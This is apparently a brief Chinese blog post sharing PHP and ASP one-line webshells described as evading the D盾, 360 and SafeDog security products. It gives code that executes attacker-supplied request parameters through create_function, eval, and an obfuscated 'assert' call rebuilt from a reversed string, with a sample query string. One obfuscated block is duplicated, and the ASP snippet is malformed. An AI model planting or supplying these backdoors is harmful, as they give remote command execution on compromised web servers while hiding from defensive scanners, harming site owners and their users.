2016-9-1 ASP PHP 过狗一句话

<?php
$s = create_function('', $_REQUEST['c']);
$s();
// s.php?c=eval%28$_REQUEST[cmd]%29;&cmd=echo%201;
?>


%
    dim cc1_=request (sql)
    if c1_ then
    eval (ex&ecu&te&(c1_))
    end if
%

-

D盾,360
<?php
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function  yuag_array($b,$c){
$b=strrev($b);
print "www.yuag.org";
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['yuag']);


过D盾过安全狗

<?php
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function  yuag_array($b,$c){
$b=strrev($b);
print "www.yuag.org";
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['yuag']);

人人为我,我为人人
孤独,本菜鸟希望多交些渗透朋友:D

标签: none

添加新评论